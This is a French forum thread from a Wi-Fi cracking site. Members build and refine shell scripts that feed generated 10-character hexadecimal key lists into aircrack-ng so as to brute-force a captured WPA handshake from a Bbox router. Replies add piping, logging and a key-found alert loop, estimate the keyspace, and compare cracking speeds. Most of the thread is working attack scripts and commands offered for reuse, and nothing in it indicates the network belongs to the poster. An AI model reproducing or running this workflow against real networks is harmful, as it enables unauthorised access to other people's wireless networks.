Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 23-02-2015 10:59:34

romeoandjuliet
Membre Actif
Inscription : 23-02-2015
Messages : 25

Crack clefs wpa, probabilités, longueur de clés

Bonjour tout le monde,

Ca fait un petit bout de temps que je suis ce forum genial et j'ai décidé de m'inscrire.
J'ai quelques questions a poser et egalement des avis a demander.

J'ai récupéré le code source du Liveboxgenerator de Spzdb1 (merci pour le code) et l'utilise pour mes besoins

Je vous propose un script permettant s'automatiser la création du dictionaire de cles hexadecimales, et de tenter d'utiliser aircrack pour casser le handshake :

Soit le script suivant : automate.sh

for i in `seq 1 1000000` # 100000 est totalement subjectif
do
./liveboxgenerator 1000000 password$i.lst #avec liveboxgenerator le nom du programme deSpzdb1
                                          #1000000 car je me suis apercu que au dela le fprintf du programme avait 
                                          #tendance a buguer : au dela de 2G sur mon systeme, fprintf n'ecrit plus rien
aircrack-ng -w password$i.lst /path/to/HANdHAKE.cap
done

Voila. Pour le lancer je suggere :

 sh ./automate.sh > log.txt  

Ce qui nous permet trois avantages :
1) Pas d'affichage sur l'ecran donc un peu plus de rapidite - enfin je crois-
2) Sauver la sortie de aircrack, donc on a pas besoin de monitorer le script en permanence, il suffit de le lancer toute une journée puis de temps en temps verifier l'avancement et la vitesse avec :

 tail log.txt  

3) Verifier aisément si la clef a été trouvée en tapant :

 cat log.txt | grep KEY  

OU encore mieux via un script lancé de maniere periodique qui nous avertit grace a une alerte sonore :
Soit le script suivant : periodic_check.sh

clear
tail log.txt | grep tested # pour nous afficher la vitesse de test des clés
if grep "KEY" log.txt 
then 
grep "KEY" log.txt > KEY_FOUND # permet de sauver la clé si elle est trouvée
sh ./beep.sh  # puis de lancer l'alerte
else 
echo "Nope"
fi 

En combinaison avec le script : beep.sh :

while true
do
paplay /usr/share/sounds/votresonprefere --volume=60000 # paplay est un lecteur de sons. Le volume max est 65536
done

Qui sonnera toute la journée sil le faut mais au moins vous l'entendrez hurler que c'est votre jour de chance lol

On automatise le processu toutes les 30 secondes par exemple :

 watch -n 30 sh ./periodic_check.sh 

Voila voila !!! Vous n'avez plus qu'a lancer vos deux scripts : automate.sh et periodic_check.sh et à attendre le beeeepp de fin !

Du coup jvous demande votre avis :
- Je bosse actuellement - pour le fun - sur un handshake de Bbox recente (donc non vulnerable a la faille decouverte par m1ck3y), et je fais tourner ce script avec le liveboxgenerator calé sur une génération de clefs a 10 caracteres hexadecimaux.
Du coup je me demandais : 
   1) Est ce que j'ai raison de partir sur le fait que les Bbox ont une clef par defaut de 10 char hexadecimaux ?
   2) Si c'est le cas selon crunch il y aurait a peu près 1000 milliard de clefs possibles a 10 char hexadecimaux : Que
      pensez vous du nombre de clefs "improbables" ? genre 00:00:etc ? 20 % ? 25 % ?
   3) Sur mon pc je teste 1 million de clefs / 25 minutes. Donc toutes les 25 minutes j'ai au pire (et en ne considerant PAS
      les doublons) on aurait 1 chance sur 1 million de trouver la clé toutes les 25 minutes ? Ou en considerant les cles
     "impropables" 1 chance sur 750 000 ?
   4) Est ce un moyen "convenable de casser une clé ?
   5) Deja que les chances paraissent minces, j'imagine meme pas la difficulté de peter une cles de 23 char de livebox...

Qu'en pensez vous ?

EDIT : Oups pour le fait que au dela de 2G fprintf n'ecrit plus rien je sais pas si c'est du au "long" dans la source ou bel et bien a frptinf qui deconne" zavez des idées ? smile

Dernière modification par romeoandjuliet (23-02-2015 13:01:43)

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 23-02-2015 15:50:11

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : Crack clefs wpa, probabilités, longueur de clés

Bonjour romeo (et à juliet aussi) smile
Joli sujet de bienvenue c'est sympat. 

regardons un peu ton code ensemble....

for i in `seq 1 1000000` # 100000 est totalement subjectif
do
./liveboxgenerator 1000000 password$i.lst #avec liveboxgenerator le nom du programme deSpzdb1
                                          #1000000 car je me suis apercu que au dela le fprintf du programme avait 
                                          #tendance a buguer : au dela de 2G sur mon systeme, fprintf n'ecrit plus rien
aircrack-ng -w password$i.lst /path/to/HANdHAKE.cap
done

Tu pourrais piper la sortie de liveboxgenrator vers aircrack-ng (ou encore mieux vers pyrit ou hashcat - si tu disposes d'une carte vidéo compatible) et tu n'aurais plus de problème de stockage.

for i in `seq 1 1000000`; 
  do
     ./liveboxgenerator 1000000 | aircrack-ng  /path/to/HANdHAKE.cap -e eSSID -w-
done 
romeoandjuliet a écrit :

Voila. Pour le lancer je suggere :

sh ./automate.sh > log.txt  

Ce qui nous permet trois avantages :
1) Pas d'affichage sur l'ecran donc un peu plus de rapidite - enfin je crois-

1) Bien vu sauf que la sortie ne se voit pas en console mais s'écrit dans le fichier ce qui fait que ta vitesse va ête plus ou moins la même au bout du compte....
un problèmne que je vois c'est l'utilisation de ">" qui va écraser chaque fois le log ancien avec le nouveau log.... donc tu ne vas jamais avoir la celf même si aircrack-ng la trouve... il te faux utiliser ">>" si tu veux ajoutter au log prećednets le log en cours
Tu peux aussi rediriger la sortie directement dans ta première boucle:

for i in `seq 1 1000000`; 
  do
     ./liveboxgenerator 1000000 | aircrack-ng  /path/to/HANdHAKE.cap -e eSSID -w- >> /path/to/logfile
done 

OU encore mieux via un script lancé de maniere periodique qui nous avertit grace a une alerte sonore :
Soit le script suivant : periodic_check.sh

  l'dée est sympa. CE serait plus light si tu te contentais de vérifier à chaque fin de séquence "liveboxgenerator" si la clef a été récupérée ou pas.
par example de façon basique unifiée

for i in `seq 1 1000000`; 
  do
     ./liveboxgenerator 1000000 | aircrack-ng  /path/to/HANdHAKE.cap -e eSSID -w- >> /path/to/logfile
       if [-n `cat  /path/to/logfile | grep "KEY FOUND"`]        # condition if qui s'exécute si aircrack-ng trouve la clef
         then                                                                     
             paplay /usr/share/sounds/votresonprefere --volume=60000   # le son est joué
             exit 0                                                                                 # le programme est arrêté en état 0 (succès)
       fi                                                                                             # la clef est dans le fichier de log  
done

Un seul script = une seule console = un PID unique = gain en efficience

Lorsque j'utilise "if [-n blablablabla ]" cela veut dire que ma  commande va s'éxécuter si le retour de "blablablabla" N'EST PAS NULL. (n'est pas vide, n'a pas une valeure nulle)
dans le cas présent c'est un "grep" sur le log avec les mots "KEY FOUND" qu'affichent aircrack-ng en cas de succès (ça tu le sais comme le montre ton code)
Ce sont justes des petits conseils et sûrement pas les meilleurs sur le marché je ne suis pas programatteur... tongue
Dans tous les cas merci pour le partage.
Et surtout bienvenue à crack-wifi.com smile

Hors Ligne

#3 24-02-2015 14:54:00

romeoandjuliet
Membre Actif
Inscription : 23-02-2015
Messages : 25

Re : Crack clefs wpa, probabilités, longueur de clés

Salut kcdtv !
D'abord merci beaucoup pour tes conseils et tes améliorations portées au script,
c'est bien plus efficace comme ca.
Par contre j'ai du modifer deux torois trucs, car sur mon systeme, le pipe du liveboxgenerator vers aircrack ne fonctionne pas !
Et ensuite j'ai des bugs avec la conditions if [ -n ....] du coup je l'ai simplifée et améliorée en une seule commande le grep qui retourne un booléen smile

Voici le code finalisé :

 
for i in `seq 1 1000000``
   do
	./liveboxgenerator 1000000 password$i.lst
	aircrack-ng /path/to/handshake -e ESSID -w password$i.lst >> log.txt
	if grep "KEY FOUND" log.txt # grep retourne 1 si la clé est présente
	   then
		grep "KEY FOUND" log.txt > KEY_FOUND # On sauve la clé
		while true  # boucle infinie
		do
		paplay /usr:share/sounds/votresonprefere --volume = 60000 #  joue votre son jusqua ce que vous interveniez... Volume max = 65535
		done
	fi
done

Voila voila, il m'a l'air finalisé, que pense tu, dois je créer un nouveau topic pour proposer ce petit script ?
Merci encore de la relecture !

Ah et tu aurais des idées par rapport aux questions de mon premier post ? smile

Hors Ligne

#4 24-02-2015 20:10:42

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : Crack clefs wpa, probabilités, longueur de clés

Yes! Ça fait beaucoup plus "clean" comme ça...  cool

Par contre j'ai du modifer deux torois trucs, car sur mon systeme, le pipe du liveboxgenerator vers aircrack ne fonctionne pas !

J'avais oublié de dire que cette partie là était livrée sans garantie big_smile (je n'ai pas le code liveboxgenerator)

Voila voila, il m'a l'air finalisé, que pense tu, dois je créer un nouveau topic pour proposer ce petit script ?

Bonne idée. smile
Tu peux ouvrir un thème dans notre section programmation script et codage

Ah et tu aurais des idées par rapport aux questions de mon premier post ? smile

j'avais complètement zappé...

1) Est ce que j'ai raison de partir sur le fait que les Bbox ont une clef par defaut de 10 char hexadecimaux ?
   2) Si c'est le cas selon crunch il y aurait a peu près 1000 milliard de clefs possibles a 10 char hexadecimaux : Que
      pensez vous du nombre de clefs "improbables" ? genre 00:00:etc ? 20 % ? 25 % ?
   3) Sur mon pc je teste 1 million de clefs / 25 minutes. Donc toutes les 25 minutes j'ai au pire (et en ne considerant PAS
      les doublons) on aurait 1 chance sur 1 million de trouver la clé toutes les 25 minutes ? Ou en considerant les cles
     "improbables" 1 chance sur 750 000 ?
   4) Est ce un moyen "convenable de casser une clé ?
   5) Deja que les chances paraissent minces, j'imagine meme pas la difficulté de peter une cles de 23 char de livebox...
Qu'en pensez vous ?
EDIT : Oups pour le fait que au dela de 2G fprintf n'ecrit plus rien je sais pas si c'est du au "long" dans la source ou bel et bien a frptinf qui deconne" zavez des idées ? smile

1. si il s'agit des bbox SAGEM oui
2. Les clefs "improbables" ne sont que des vues de l'esprit... il est improbable dans un sytème aléatoire d'obtenir (par example) 0000000000. Mais c'est exactement la Même probabilité que d'obtenir 5FB38A947D qui semble être une clef plus "probable".
3. Si tu parles de longueur 10 charset hexadecimal (16 possibilités) ça te fait  16¹⁰ probabilités en total.. (1,099511628×10¹²) donc si tu passes un milion de clef représente  0,000090949% de l'ensemble soit à peu près une chance sur un million, ça me semble juste
  4. C'est envisageable avec une carte video puissante
  5. Ça fait mal à la tète ces grands chiffres. C'est "exponentiel" : plus tu as de caracrtères dans ton pass et plus ton exposant augmente ce qui dessine une courbe de croissance vertigineuse.

Hors Ligne

#5 25-02-2015 17:21:42

romeoandjuliet
Membre Actif
Inscription : 23-02-2015
Messages : 25

Re : Crack clefs wpa, probabilités, longueur de clés

Ca roule je fais ca de suite !

Ah parfait mes ptits calculs étaient pas faux :3
Haha la blague, je teste mon crack à 700 clès par secondes....et ma carte video supporte pas pyrit je crois hmm C'est du intel et apparemment ca marche pas dessus si ?

Hors Ligne

#6 25-02-2015 21:49:06

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : Crack clefs wpa, probabilités, longueur de clés

Pas forcément vu qu'il y a la possibilité d'utiliser opencl... c'est à voir au cas par cas et dans les détails
Pour plus d'infos et pour poser des questions sur ce thème nous avons un forum dédié:
- GPU cracking 

Haha la blague, je teste mon crack à 700 clès par secondes...

C'est pas une blague je te le pomet; c'est ce que te donne un duo core.... big_smile

lscpu && aircrack-ng -S
Arquitectura:          x86_64
CPU op-mode(s):        32-bit, 64-bit
Orden de bytes:        Little Endian
CPU(s):                2
On-line CPU(s) list:   0,1
Hilo(s) por núcleo:   1
Núcleo(s) por zócalo:2
Socket(s):             1
Nodo(s) NUMA:          1
ID del vendedor:       GenuineIntel
Familia de CPU:        6
Modelo:                55
Model name:            Intel(R) Celeron(R) CPU  N2840  @ 2.16GHz
Stepping:              8
CPU MHz:               1661.490
CPU max MHz:           2582,3000
CPU min MHz:           499,8000
BogoMIPS:              4326.40
Virtualización:       VT-x
caché L1d:            24K
caché L1i:            32K
caché L2:             1024K
NUMA node0 CPU(s):     0,1
647 k/s
[email protected]:~$

j'ai le navigateur en marche et deux consoles ouvertes donc ça enlève un peu de puissance mais je ne dépasse pas les 700 keys/secondes en y dédiant toutes mes ressources CPU

Hors Ligne

#7 27-02-2015 07:52:52

romeoandjuliet
Membre Actif
Inscription : 23-02-2015
Messages : 25

Re : Crack clefs wpa, probabilités, longueur de clés

Ah ca pourrait etre scrément interessant ! jvais essayer alors, et je vais me renseigner sur le fofo et ailleurs, merci !
Oui oui pareil j'ai le meme dual core et en moyenne jsuis a 647 k/s big_smile

T'as joué un eu avec pyrit ? Il est sympa ?

Ah et tu pense quoi de l'utilisation des cluster d'amazon ? smile

Hors Ligne

#8 27-02-2015 16:43:52

petros
Membre Hyperactif
Inscription : 16-08-2013
Messages : 48

Re : Crack clefs wpa, probabilités, longueur de clés

et pour mon duo core: "Intel(R) Core(TM)2 Duo CPU  L9400  @ 1.86GHz"
1191 k/s .... mais avec EWSA 5.9 et sous win7 64b

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.034 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]